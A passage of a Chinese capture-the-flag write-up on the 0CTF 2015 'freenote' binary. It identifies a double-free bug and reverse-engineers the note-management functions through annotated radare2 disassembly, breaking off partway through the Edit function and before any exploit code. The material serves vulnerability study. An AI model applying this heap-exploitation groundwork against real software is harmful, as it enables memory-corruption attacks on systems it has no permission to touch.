我的书签
添加书签
移除书签6.1.7 pwn 0CTF2015 freenote
题目复现
$ file freenotefreenote: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=dd259bb085b3a4aeb393ec5ef4f09e312555a64d, stripped$ checksec -f freenoteRELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILEPartial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 2 freenote$ strings libc-2.19.so | grep "GNU C"GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.6) stable release version 2.19, by Roland McGrath et al.Compiled by GNU CC version 4.8.2.
因为没有 PIE,即使本机开启 ASLR 也没有关系。
玩一下,它有 List、New、Edit、Delete 四个功能:
$ ./freenote== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 2Length of new note: 5Enter your note: AAAADone.== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 10. AAAA== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 3Note number: 0Length of note: 10Enter your note: BBBBBBBBBDone.== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 10. BBBBBBBBB== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 4Note number: 0Done.== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 1You need to create some new notes first.== 0ops Free Note ==1. List Note2. New Note3. Edit Note4. Delete Note5. Exit====================Your choice: 5Bye
然后漏洞似乎也很明显,如果我们两次 Delete 同一个笔记,则触发 double free:
*** Error in `./freenote': double free or corruption (!prev): 0x0000000000672830 ***Aborted
在 Ubuntu 14.04 上把程序跑起来:
$ socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.19.so ./freenote" &
题目解析
我们先来看一下 main 函数:
[0x00400770]> pdf @ main/ (fcn) main 60| main ();| ; var int local_4h @ rbp-0x4| ; DATA XREF from 0x0040078d (entry0)| 0x00401087 55 push rbp| 0x00401088 4889e5 mov rbp, rsp| 0x0040108b 4883ec10 sub rsp, 0x10| 0x0040108f b800000000 mov eax, 0| 0x00401094 e864f9ffff call sub.setvbuf_9fd ; int setvbuf(FILE*stream, char*buf, int mode, size_t size)| 0x00401099 b800000000 mov eax, 0| 0x0040109e e8a6f9ffff call sub.malloc_a49 ; void *malloc(size_t size)| ; JMP XREF from 0x0040110f (main + 136)| 0x004010a3 b800000000 mov eax, 0| 0x004010a8 e8ebf8ffff call sub.0ops_Free_Note_998| 0x004010ad 8945fc mov dword [local_4h], eax| 0x004010b0 837dfc05 cmp dword [local_4h], 5 ; [0x5:4]=-1 ; 5| ,=< 0x004010b4 774e ja 0x401104| | 0x004010b6 8b45fc mov eax, dword [local_4h]| | 0x004010b9 488b04c5f812. mov rax, qword [rax*8 + 0x4012f8] ; [0x4012f8:8]=0x401104\ | 0x004010c1 ffe0 jmp rax
main 函数首先调用 sub.malloc_a49() 分配一块内存并进行初始化,然后读取用户输入,根据偏移跳转到相应的函数上去(典型的switch实现):
[0x00400770]> px 48 @ 0x4012f8- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF0x004012f8 0411 4000 0000 0000 c310 4000 0000 0000 ..@.......@.....0x00401308 cf10 4000 0000 0000 db10 4000 0000 0000 ..@.......@.....0x00401318 e710 4000 0000 0000 f310 4000 0000 0000 ..@.......@.....
[0x00400770]> pd 22 @ 0x4010c3: 0x004010c3 b800000000 mov eax, 0: 0x004010c8 e847faffff call sub.You_need_to_create_some_new_notes_first._b14,==< 0x004010cd eb40 jmp 0x40110f|: 0x004010cf b800000000 mov eax, 0|: 0x004010d4 e8e9faffff call sub.Length_of_new_note:_bc2,===< 0x004010d9 eb34 jmp 0x40110f||: 0x004010db b800000000 mov eax, 0||: 0x004010e0 e8a2fcffff call sub.Note_number:_d87,====< 0x004010e5 eb28 jmp 0x40110f|||: 0x004010e7 b800000000 mov eax, 0|||: 0x004010ec e88cfeffff call sub.No_notes_yet._f7d,=====< 0x004010f1 eb1c jmp 0x40110f||||: 0x004010f3 bfe6124000 mov edi, 0x4012e6||||: 0x004010f8 e8c3f5ffff call sym.imp.puts ; int puts(const char *s)||||: 0x004010fd b800000000 mov eax, 0,======< 0x00401102 eb0d jmp 0x401111|||||: ; JMP XREF from 0x004010b4 (main)|||||: 0x00401104 bfea124000 mov edi, str.Invalid ; 0x4012ea ; "Invalid!"|||||: 0x00401109 e8b2f5ffff call sym.imp.puts ; int puts(const char *s)|||||: 0x0040110e 90 nop|||||| ; JMP XREF from 0x004010cd (main + 70)|||||| ; JMP XREF from 0x004010d9 (main + 82)|||||| ; JMP XREF from 0x004010e5 (main + 94)|||||| ; JMP XREF from 0x004010f1 (main + 106)|`````=< 0x0040110f eb92 jmp 0x4010a3 ; main+0x1c| ; JMP XREF from 0x00401102 (main + 123)`------> 0x00401111 c9 leave0x00401112 c3 ret
所以四个功能对应的函数如下:
- List:
sub.You_need_to_create_some_new_notes_first._b14 - New:
sub.Length_of_new_note:_bc2 - Edit:
call sub.Note_number:_d87 - Delete:
call sub.No_notes_yet._f7d
函数 sub.malloc_a49 如下:
[0x00400770]> pdf @ sub.malloc_a49/ (fcn) sub.malloc_a49 203| sub.malloc_a49 ();| ; var int local_4h @ rbp-0x4| ; CALL XREF from 0x0040109e (main)| 0x00400a49 55 push rbp| 0x00400a4a 4889e5 mov rbp, rsp| 0x00400a4d 4883ec10 sub rsp, 0x10| 0x00400a51 bf10180000 mov edi, 0x1810| 0x00400a56 e8d5fcffff call sym.imp.malloc ; void *malloc(size_t size)| 0x00400a5b 488905461620. mov qword [0x006020a8], rax ; [0x6020a8:8]=0| 0x00400a62 488b053f1620. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400a69 48c700000100. mov qword [rax], 0x100 ; [0x100:8]=-1 ; 256 ; Notes 结构体成员 max| 0x00400a70 488b05311620. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400a77 48c740080000. mov qword [rax + 8], 0 ; Notes 结构体成员 length| 0x00400a7f c745fc000000. mov dword [local_4h], 0 ; [local_4h] 是 Note 的序号| ,=< 0x00400a86 eb7d jmp 0x400b05| | ; JMP XREF from 0x00400b0c (sub.malloc_a49)| .--> 0x00400a88 488b0d191620. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0 ; Notes 结构体的地址| :| 0x00400a8f 8b45fc mov eax, dword [local_4h]| :| 0x00400a92 4863d0 movsxd rdx, eax| :| 0x00400a95 4889d0 mov rax, rdx| :| 0x00400a98 4801c0 add rax, rax ; '#'| :| 0x00400a9b 4801d0 add rax, rdx ; '('| :| 0x00400a9e 48c1e003 shl rax, 3 ; 序号 *24| :| 0x00400aa2 4801c8 add rax, rcx ; '&'| :| 0x00400aa5 4883c010 add rax, 0x10 ; 序号对应的 Note 地址| :| 0x00400aa9 48c700000000. mov qword [rax], 0 ; Note 结构体成员 isValid 初始化为 0| :| 0x00400ab0 488b0df11520. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| :| 0x00400ab7 8b45fc mov eax, dword [local_4h]| :| 0x00400aba 4863d0 movsxd rdx, eax| :| 0x00400abd 4889d0 mov rax, rdx| :| 0x00400ac0 4801c0 add rax, rax ; '#'| :| 0x00400ac3 4801d0 add rax, rdx ; '('| :| 0x00400ac6 48c1e003 shl rax, 3| :| 0x00400aca 4801c8 add rax, rcx ; '&'| :| 0x00400acd 4883c010 add rax, 0x10| :| 0x00400ad1 48c740080000. mov qword [rax + 8], 0 ; Note 结构体成员 length 初始化为 0| :| 0x00400ad9 488b0dc81520. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| :| 0x00400ae0 8b45fc mov eax, dword [local_4h]| :| 0x00400ae3 4863d0 movsxd rdx, eax| :| 0x00400ae6 4889d0 mov rax, rdx| :| 0x00400ae9 4801c0 add rax, rax ; '#'| :| 0x00400aec 4801d0 add rax, rdx ; '('| :| 0x00400aef 48c1e003 shl rax, 3| :| 0x00400af3 4801c8 add rax, rcx ; '&'| :| 0x00400af6 4883c020 add rax, 0x20| :| 0x00400afa 48c700000000. mov qword [rax], 0 ; Note 结构体成员 content 初始化为 0| :| 0x00400b01 8345fc01 add dword [local_4h], 1 ; 序号 +1| :| ; JMP XREF from 0x00400a86 (sub.malloc_a49)| :`-> 0x00400b05 817dfcff0000. cmp dword [local_4h], 0xff ; [0xff:4]=-1 ; 255 ; 循环初始化 Note| `==< 0x00400b0c 0f8e76ffffff jle 0x400a88| 0x00400b12 c9 leave\ 0x00400b13 c3 ret
该函数调用 malloc 在堆上分配 0x1810 字节的内存用来存放数据。我们可以猜测这里还存在两个结构体,Note 和 Notes:
struct Note {int isValid; // 1 表示笔记存在,0 表示笔记不存在int length; // 笔记长度char *content; // 指向笔记内容的指针} Note;struct Notes {int max; // 笔记总数上限 0x100int length; // 当前笔记数量Note notes[256]; // 笔记} Notes;
接下来依次分析程序四个功能的实现,先从 List 开始:
[0x00400770]> pdf @ sub.You_need_to_create_some_new_notes_first._b14/ (fcn) sub.You_need_to_create_some_new_notes_first._b14 174| sub.You_need_to_create_some_new_notes_first._b14 ();| ; var int local_4h @ rbp-0x4| ; CALL XREF from 0x004010c8 (main + 65)| 0x00400b14 55 push rbp| 0x00400b15 4889e5 mov rbp, rsp| 0x00400b18 4883ec10 sub rsp, 0x10| 0x00400b1c 488b05851520. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400b23 488b4008 mov rax, qword [rax + 8] ; [0x8:8]=-1 ; 8 ; 取出 Notes 结构体成员 length| 0x00400b27 4885c0 test rax, rax ; 判断 length 是否为 0| ,=< 0x00400b2a 0f8e86000000 jle 0x400bb6 ; 如果为 0,即没有笔记时跳转,该函数结束| | 0x00400b30 c745fc000000. mov dword [local_4h], 0 ; [local_4h] 初始化为 0| ,==< 0x00400b37 eb66 jmp 0x400b9f| || ; JMP XREF from 0x00400bb2 (sub.You_need_to_create_some_new_notes_first._b14)| .---> 0x00400b39 488b0d681520. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| :|| 0x00400b40 8b45fc mov eax, dword [local_4h]| :|| 0x00400b43 4863d0 movsxd rdx, eax| :|| 0x00400b46 4889d0 mov rax, rdx| :|| 0x00400b49 4801c0 add rax, rax ; '#'| :|| 0x00400b4c 4801d0 add rax, rdx ; '('| :|| 0x00400b4f 48c1e003 shl rax, 3| :|| 0x00400b53 4801c8 add rax, rcx ; '&'| :|| 0x00400b56 4883c010 add rax, 0x10 ; rax 为 local_4h 序号处的 Note| :|| 0x00400b5a 488b00 mov rax, qword [rax] ; 取出 Note 结构体成员 isValid| :|| 0x00400b5d 4883f801 cmp rax, 1 ; 1| ,====< 0x00400b61 7538 jne 0x400b9b ; 如果 isValid != 1,跳过打印| |:|| 0x00400b63 488b0d3e1520. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| |:|| 0x00400b6a 8b45fc mov eax, dword [local_4h]| |:|| 0x00400b6d 4863d0 movsxd rdx, eax| |:|| 0x00400b70 4889d0 mov rax, rdx| |:|| 0x00400b73 4801c0 add rax, rax ; '#'| |:|| 0x00400b76 4801d0 add rax, rdx ; '('| |:|| 0x00400b79 48c1e003 shl rax, 3| |:|| 0x00400b7d 4801c8 add rax, rcx ; '&'| |:|| 0x00400b80 4883c020 add rax, 0x20| |:|| 0x00400b84 488b10 mov rdx, qword [rax]| |:|| 0x00400b87 8b45fc mov eax, dword [local_4h]| |:|| 0x00400b8a 89c6 mov esi, eax| |:|| 0x00400b8c bf1d124000 mov edi, str.d.__s ; 0x40121d ; "%d. %s\n"| |:|| 0x00400b91 b800000000 mov eax, 0| |:|| 0x00400b96 e845fbffff call sym.imp.printf ; int printf(const char *format) ; 打印出序号和内容| |:|| ; JMP XREF from 0x00400b61 (sub.You_need_to_create_some_new_notes_first._b14)| `----> 0x00400b9b 8345fc01 add dword [local_4h], 1| :|| ; JMP XREF from 0x00400b37 (sub.You_need_to_create_some_new_notes_first._b14)| :`--> 0x00400b9f 8b45fc mov eax, dword [local_4h] ; eax = [local_4h]| : | 0x00400ba2 4863d0 movsxd rdx, eax ; rdx = eax == [local_4h]| : | 0x00400ba5 488b05fc1420. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0 ; 取出 Notes 地址| : | 0x00400bac 488b00 mov rax, qword [rax] ; 取出结构体成员 max == 0x100| : | 0x00400baf 4839c2 cmp rdx, rax ; 比较当前笔记序号 rdx 与 max| `===< 0x00400bb2 7c85 jl 0x400b39 ; 遍历所有笔记| ,==< 0x00400bb4 eb0a jmp 0x400bc0| || ; JMP XREF from 0x00400b2a (sub.You_need_to_create_some_new_notes_first._b14)| |`-> 0x00400bb6 bf28124000 mov edi, str.You_need_to_create_some_new_notes_first. ; 0x401228 ; "You need to create some new notes first."| | 0x00400bbb e800fbffff call sym.imp.puts ; int puts(const char *s)| | ; JMP XREF from 0x00400bb4 (sub.You_need_to_create_some_new_notes_first._b14)| `--> 0x00400bc0 c9 leave\ 0x00400bc1 c3 ret
该函数会打印出所有 isValid 成员为 1 的笔记。
New 的实现如下:
[0x00400770]> pdf @ sub.Length_of_new_note:_bc2/ (fcn) sub.Length_of_new_note:_bc2 453| sub.Length_of_new_note:_bc2 (int arg_1000h);| ; var int local_14h @ rbp-0x14| ; var int local_10h @ rbp-0x10| ; var int local_ch @ rbp-0xc| ; var int local_8h @ rbp-0x8| ; var int local_0h @ rbp-0x0| ; arg int arg_1000h @ rbp+0x1000| ; CALL XREF from 0x004010d4 (main + 77)| 0x00400bc2 55 push rbp| 0x00400bc3 4889e5 mov rbp, rsp| 0x00400bc6 4883ec20 sub rsp, 0x20| 0x00400bca 488b05d71420. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400bd1 488b5008 mov rdx, qword [rax + 8] ; [0x8:8]=-1 ; 8 ; 取出 Notes 成员 length| 0x00400bd5 488b05cc1420. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400bdc 488b00 mov rax, qword [rax] ; 取出 Notes 成员 max| 0x00400bdf 4839c2 cmp rdx, rax| ,=< 0x00400be2 7c0f jl 0x400bf3 ; 当 length < max 时继续,否则表示笔记本已满| | 0x00400be4 bf51124000 mov edi, str.Unable_to_create_new_note. ; 0x401251 ; "Unable to create new note."| | 0x00400be9 e8d2faffff call sym.imp.puts ; int puts(const char *s)| ,==< 0x00400bee e992010000 jmp 0x400d85| || ; JMP XREF from 0x00400be2 (sub.Length_of_new_note:_bc2)| |`-> 0x00400bf3 c745ec000000. mov dword [local_14h], 0 ; [local_14h] 初始化为 0| |,=< 0x00400bfa e96d010000 jmp 0x400d6c| || ; JMP XREF from 0x00400d7f (sub.Length_of_new_note:_bc2)| .---> 0x00400bff 488b0da21420. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| :|| 0x00400c06 8b45ec mov eax, dword [local_14h]| :|| 0x00400c09 4863d0 movsxd rdx, eax| :|| 0x00400c0c 4889d0 mov rax, rdx| :|| 0x00400c0f 4801c0 add rax, rax ; '#'| :|| 0x00400c12 4801d0 add rax, rdx ; '('| :|| 0x00400c15 48c1e003 shl rax, 3| :|| 0x00400c19 4801c8 add rax, rcx ; '&'| :|| 0x00400c1c 4883c010 add rax, 0x10| :|| 0x00400c20 488b00 mov rax, qword [rax]| :|| 0x00400c23 4885c0 test rax, rax ; rax 表示成员 isValid| ,====< 0x00400c26 0f853c010000 jne 0x400d68 ; 当 isValid 为 1 时,表示当前序号处笔记已经存在,跳过| |:|| 0x00400c2c bf6c124000 mov edi, str.Length_of_new_note: ; 0x40126c ; "Length of new note: "| |:|| 0x00400c31 b800000000 mov eax, 0| |:|| 0x00400c36 e8a5faffff call sym.imp.printf ; int printf(const char *format)| |:|| 0x00400c3b b800000000 mov eax, 0| |:|| 0x00400c40 e809fdffff call sub.atoi_94e ; int atoi(const char *str)| |:|| 0x00400c45 8945f0 mov dword [local_10h], eax ; [local_10h] 是笔记长度| |:|| 0x00400c48 837df000 cmp dword [local_10h], 0| ,=====< 0x00400c4c 7f0f jg 0x400c5d ; 大于 0 时| ||:|| 0x00400c4e bf81124000 mov edi, str.Invalid_length ; 0x401281 ; "Invalid length!"| ||:|| 0x00400c53 e868faffff call sym.imp.puts ; int puts(const char *s)| ,======< 0x00400c58 e928010000 jmp 0x400d85| |||:|| ; JMP XREF from 0x00400c4c (sub.Length_of_new_note:_bc2)| |`-----> 0x00400c5d 817df0001000. cmp dword [local_10h], 0x1000 ; [0x1000:4]=-1| |,=====< 0x00400c64 7e07 jle 0x400c6d ; 小于等于 0x1000 时| |||:|| 0x00400c66 c745f0001000. mov dword [local_10h], 0x1000 ; 否则 [local_10h] = 0x1000| |||:|| ; JMP XREF from 0x00400c64 (sub.Length_of_new_note:_bc2)| |`-----> 0x00400c6d 8b45f0 mov eax, dword [local_10h]| | |:|| 0x00400c70 99 cdq| | |:|| 0x00400c71 c1ea19 shr edx, 0x19| | |:|| 0x00400c74 01d0 add eax, edx| | |:|| 0x00400c76 83e07f and eax, 0x7f| | |:|| 0x00400c79 29d0 sub eax, edx| | |:|| 0x00400c7b ba80000000 mov edx, 0x80 ; 128| | |:|| 0x00400c80 29c2 sub edx, eax| | |:|| 0x00400c82 89d0 mov eax, edx| | |:|| 0x00400c84 c1f81f sar eax, 0x1f| | |:|| 0x00400c87 c1e819 shr eax, 0x19| | |:|| 0x00400c8a 01c2 add edx, eax| | |:|| 0x00400c8c 83e27f and edx, 0x7f| | |:|| 0x00400c8f 29c2 sub edx, eax| | |:|| 0x00400c91 89d0 mov eax, edx| | |:|| 0x00400c93 89c2 mov edx, eax| | |:|| 0x00400c95 8b45f0 mov eax, dword [local_10h]| | |:|| 0x00400c98 01d0 add eax, edx| | |:|| 0x00400c9a 8945f4 mov dword [local_ch], eax| | |:|| 0x00400c9d 8b45f4 mov eax, dword [local_ch]| | |:|| 0x00400ca0 4898 cdqe| | |:|| 0x00400ca2 4889c7 mov rdi, rax ; rdi 最终为 ((128 - [local_10h] % 128) % 128 + [local_10h])| | |:|| 0x00400ca5 e886faffff call sym.imp.malloc ; void *malloc(size_t size)| | |:|| 0x00400caa 488945f8 mov qword [local_8h], rax ; [local_8h] 为 Note 内容的地址| | |:|| 0x00400cae bf91124000 mov edi, str.Enter_your_note: ; 0x401291 ; "Enter your note: "| | |:|| 0x00400cb3 b800000000 mov eax, 0| | |:|| 0x00400cb8 e823faffff call sym.imp.printf ; int printf(const char *format)| | |:|| 0x00400cbd 8b55f0 mov edx, dword [local_10h]| | |:|| 0x00400cc0 488b45f8 mov rax, qword [local_8h]| | |:|| 0x00400cc4 89d6 mov esi, edx| | |:|| 0x00400cc6 4889c7 mov rdi, rax| | |:|| 0x00400cc9 e88ffbffff call sub.read_85d ; ssize_t read(int fildes, void *buf, size_t nbyte) ; 读入笔记内容| | |:|| 0x00400cce 488b0dd31320. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| | |:|| 0x00400cd5 8b45ec mov eax, dword [local_14h]| | |:|| 0x00400cd8 4863d0 movsxd rdx, eax| | |:|| 0x00400cdb 4889d0 mov rax, rdx| | |:|| 0x00400cde 4801c0 add rax, rax ; '#'| | |:|| 0x00400ce1 4801d0 add rax, rdx ; '('| | |:|| 0x00400ce4 48c1e003 shl rax, 3| | |:|| 0x00400ce8 4801c8 add rax, rcx ; '&'| | |:|| 0x00400ceb 4883c010 add rax, 0x10| | |:|| 0x00400cef 48c700010000. mov qword [rax], 1 ; 设置 Note 结构体成员 isValid 为 1| | |:|| 0x00400cf6 488b35ab1320. mov rsi, qword [0x006020a8] ; [0x6020a8:8]=0| | |:|| 0x00400cfd 8b45f0 mov eax, dword [local_10h]| | |:|| 0x00400d00 4863c8 movsxd rcx, eax| | |:|| 0x00400d03 8b45ec mov eax, dword [local_14h]| | |:|| 0x00400d06 4863d0 movsxd rdx, eax| | |:|| 0x00400d09 4889d0 mov rax, rdx| | |:|| 0x00400d0c 4801c0 add rax, rax ; '#'| | |:|| 0x00400d0f 4801d0 add rax, rdx ; '('| | |:|| 0x00400d12 48c1e003 shl rax, 3| | |:|| 0x00400d16 4801f0 add rax, rsi ; '+'| | |:|| 0x00400d19 4883c010 add rax, 0x10| | |:|| 0x00400d1d 48894808 mov qword [rax + 8], rcx ; 设置 Note 结构体成员 length 为 [local_10h]| | |:|| 0x00400d21 488b0d801320. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| | |:|| 0x00400d28 8b45ec mov eax, dword [local_14h]| | |:|| 0x00400d2b 4863d0 movsxd rdx, eax| | |:|| 0x00400d2e 4889d0 mov rax, rdx| | |:|| 0x00400d31 4801c0 add rax, rax ; '#'| | |:|| 0x00400d34 4801d0 add rax, rdx ; '('| | |:|| 0x00400d37 48c1e003 shl rax, 3| | |:|| 0x00400d3b 4801c8 add rax, rcx ; '&'| | |:|| 0x00400d3e 488d5020 lea rdx, [rax + 0x20] ; 32| | |:|| 0x00400d42 488b45f8 mov rax, qword [local_8h]| | |:|| 0x00400d46 488902 mov qword [rdx], rax ; 设置 Note 结构体成员 content 为 [local_8h]| | |:|| 0x00400d49 488b05581320. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| | |:|| 0x00400d50 488b5008 mov rdx, qword [rax + 8] ; [0x8:8]=-1 ; 8 ; 取出 Notes 成员 length| | |:|| 0x00400d54 4883c201 add rdx, 1 ; length +1| | |:|| 0x00400d58 48895008 mov qword [rax + 8], rdx ; 写回 length| | |:|| 0x00400d5c bfa3124000 mov edi, str.Done. ; 0x4012a3 ; "Done."| | |:|| 0x00400d61 e85af9ffff call sym.imp.puts ; int puts(const char *s)| |,=====< 0x00400d66 eb1d jmp 0x400d85| |||:|| ; JMP XREF from 0x00400c26 (sub.Length_of_new_note:_bc2)| ||`----> 0x00400d68 8345ec01 add dword [local_14h], 1| || :|| ; JMP XREF from 0x00400bfa (sub.Length_of_new_note:_bc2)| || :|`-> 0x00400d6c 8b45ec mov eax, dword [local_14h] ; eax = [local_14h]| || :| 0x00400d6f 4863d0 movsxd rdx, eax ; rdx 表示序号| || :| 0x00400d72 488b052f1320. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| || :| 0x00400d79 488b00 mov rax, qword [rax] ; 取出 Notes 成员 max| || :| 0x00400d7c 4839c2 cmp rdx, rax ; 比较序号与 max| || `===< 0x00400d7f 0f8c7afeffff jl 0x400bff ; 遍历| || | ; JMP XREF from 0x00400bee (sub.Length_of_new_note:_bc2)| || | ; JMP XREF from 0x00400c58 (sub.Length_of_new_note:_bc2)| || | ; JMP XREF from 0x00400d66 (sub.Length_of_new_note:_bc2)| ``--`--> 0x00400d85 c9 leave\ 0x00400d86 c3 ret
该函数首先对你输入的大小进行判断,如果小于 128 字节,则默认分配 128 字节的空间,如果大于 128 字节且小于 4096 字节时,则分配比输入稍大的 128 字节的整数倍的空间,如果大于 4096 字节,则默认分配 4096 字节。
Edit 的实现如下:
[0x00400770]> pdf @ sub.Note_number:_d87/ (fcn) sub.Note_number:_d87 502| sub.Note_number:_d87 (int arg_1000h);| ; var int local_1ch @ rbp-0x1c| ; var int local_18h @ rbp-0x18| ; var int local_14h @ rbp-0x14| ; var int local_0h @ rbp-0x0| ; arg int arg_1000h @ rbp+0x1000| ; CALL XREF from 0x004010e0 (main + 89)| 0x00400d87 55 push rbp| 0x00400d88 4889e5 mov rbp, rsp| 0x00400d8b 53 push rbx| 0x00400d8c 4883ec18 sub rsp, 0x18| 0x00400d90 bfa9124000 mov edi, str.Note_number: ; 0x4012a9 ; "Note number: "| 0x00400d95 b800000000 mov eax, 0| 0x00400d9a e841f9ffff call sym.imp.printf ; int printf(const char *format)| 0x00400d9f b800000000 mov eax, 0| 0x00400da4 e8a5fbffff call sub.atoi_94e ; int atoi(const char *str)| 0x00400da9 8945e8 mov dword [local_18h], eax ; [local_18h] 为要修改的笔记序号| 0x00400dac 837de800 cmp dword [local_18h], 0 ; 进行检查,确保序号是有效的| ,=< 0x00400db0 783f js 0x400df1| | 0x00400db2 8b45e8 mov eax, dword [local_18h]| | 0x00400db5 4863d0 movsxd rdx, eax| | 0x00400db8 488b05e91220. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| | 0x00400dbf 488b00 mov rax, qword [rax]| | 0x00400dc2 4839c2 cmp rdx, rax| ,==< 0x00400dc5 7d2a jge 0x400df1| || 0x00400dc7 488b0dda1220. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x00400dce 8b45e8 mov eax, dword [local_18h]| || 0x00400dd1 4863d0 movsxd rdx, eax| || 0x00400dd4 4889d0 mov rax, rdx| || 0x00400dd7 4801c0 add rax, rax ; '#'| || 0x00400dda 4801d0 add rax, rdx ; '('| || 0x00400ddd 48c1e003 shl rax, 3| || 0x00400de1 4801c8 add rax, rcx ; '&'| || 0x00400de4 4883c010 add rax, 0x10| || 0x00400de8 488b00 mov rax, qword [rax]| || 0x00400deb 4883f801 cmp rax, 1 ; 1| ,===< 0x00400def 740f je 0x400e00 ; 修改笔记的 isValid 必须为 1| ||| ; JMP XREF from 0x00400db0 (sub.Note_number:_d87)| ||| ; JMP XREF from 0x00400dc5 (sub.Note_number:_d87)| |``-> 0x00400df1 bfb7124000 mov edi, str.Invalid_number ; 0x4012b7 ; "Invalid number!"| | 0x00400df6 e8c5f8ffff call sym.imp.puts ; int puts(const char *s)| | ,=< 0x00400dfb e976010000 jmp 0x400f76| | | ; JMP XREF from 0x00400def (sub.Note_number:_d87)| `---> 0x00400e00 bfc7124000 mov edi, str.Length_of_note: ; 0x4012c7 ; "Length of note: "| | 0x00400e05 b800000000 mov eax, 0| | 0x00400e0a e8d1f8ffff call sym.imp.printf ; int printf(const char *format)| | 0x00400e0f b800000000 mov eax, 0| | 0x00400e14 e835fbffff call sub.atoi_94e ; int atoi(const char *str)| | 0x00400e19 8945e4 mov dword [local_1ch], eax ; [local_1ch] 为新大小| | 0x00400e1c 837de400 cmp dword [local_1ch], 0 ; 进行检查,确保新的大小是有效的| ,==< 0x00400e20 7f0f jg 0x400e31| || 0x00400e22 bf81124000 mov edi, str.Invalid_length ; 0x401281 ; "Invalid length!"| || 0x00400e27 e894f8ffff call sym.imp.puts ; int puts(const char *s)| ,===< 0x00400e2c e945010000 jmp 0x400f76| ||| ; JMP XREF from 0x00400e20 (sub.Note_number:_d87)| |`--> 0x00400e31 817de4001000. cmp dword [local_1ch], 0x1000 ; [0x1000:4]=-1| |,==< 0x00400e38 7e07 jle 0x400e41| ||| 0x00400e3a c745e4001000. mov dword [local_1ch], 0x1000| ||| ; JMP XREF from 0x00400e38 (sub.Note_number:_d87)| |`--> 0x00400e41 8b45e4 mov eax, dword [local_1ch]| | | 0x00400e44 4863c8 movsxd rcx, eax| | | 0x00400e47 488b355a1220. mov rsi, qword [0x006020a8] ; [0x6020a8:8]=0| | | 0x00400e4e 8b45e8 mov eax, dword [local_18h]| | | 0x00400e51 4863d0 movsxd rdx, eax| | | 0x00400e54 4889d0 mov rax, rdx| | | 0x00400e57 4801c0 add rax, rax ; '#'| | | 0x00400e5a 4801d0 add rax, rdx ; '('| | | 0x00400e5d 48c1e003 shl rax, 3| | | 0x00400e61 4801f0 add rax, rsi ; '+'| | | 0x00400e64 4883c010 add rax, 0x10| | | 0x00400e68 488b4008 mov rax, qword [rax + 8] ; [0x8:8]=-1 ; 8| | | 0x00400e6c 4839c1 cmp rcx, rax ; 比较新大小与原大小是否相同| |,==< 0x00400e6f 0f84b7000000 je 0x400f2c ; 如果相同,跳过重新分配空间的过程,直接修改笔记| ||| 0x00400e75 8b45e4 mov eax, dword [local_1ch]| ||| 0x00400e78 99 cdq| ||| 0x00400e79 c1ea19 shr edx, 0x19| ||| 0x00400e7c 01d0 add eax, edx| ||| 0x00400e7e 83e07f and eax, 0x7f| ||| 0x00400e81 29d0 sub eax, edx| ||| 0x00400e83 ba80000000 mov edx, 0x80 ; 128| ||| 0x00400e88 29c2 sub edx, eax| ||| 0x00400e8a 89d0 mov eax, edx| ||| 0x00400e8c c1f81f sar eax, 0x1f| ||| 0x00400e8f c1e819 shr eax, 0x19| ||| 0x00400e92 01c2 add edx, eax| ||| 0x00400e94 83e27f and edx, 0x7f| ||| 0x00400e97 29c2 sub edx, eax| ||| 0x00400e99 89d0 mov eax, edx| ||| 0x00400e9b 89c2 mov edx, eax| ||| 0x00400e9d 8b45e4 mov eax, dword [local_1ch]| ||| 0x00400ea0 01d0 add eax, edx| ||| 0x00400ea2 8945ec mov dword [local_14h], eax| ||| 0x00400ea5 488b1dfc1120. mov rbx, qword [0x006020a8] ; [0x6020a8:8]=0| ||| 0x00400eac 8b45ec mov eax, dword [local_14h]| ||| 0x00400eaf 4863c8 movsxd rcx, eax| ||| 0x00400eb2 488b35ef1120. mov rsi, qword [0x006020a8] ; [0x6020a8:8]=0| ||| 0x00400eb9 8b45e8 mov eax, dword [local_18h]| ||| 0x00400ebc 4863d0 movsxd rdx, eax| ||| 0x00400ebf 4889d0 mov rax, rdx| ||| 0x00400ec2 4801c0 add rax, rax ; '#'| ||| 0x00400ec5 4801d0 add rax, rdx ; '('| ||| 0x00400ec8 48c1e003 shl rax, 3| ||| 0x00400ecc 4801f0 add rax, rsi ; '+'| ||| 0x00400ecf 4883c020 add rax, 0x20| ||| 0x00400ed3 488b00 mov rax, qword [rax]| ||| 0x00400ed6 4889ce mov rsi, rcx ; rsi 为分配的大小,算法和 New 过程中的一样| ||| 0x00400ed9 4889c7 mov rdi, rax ; rdi 为 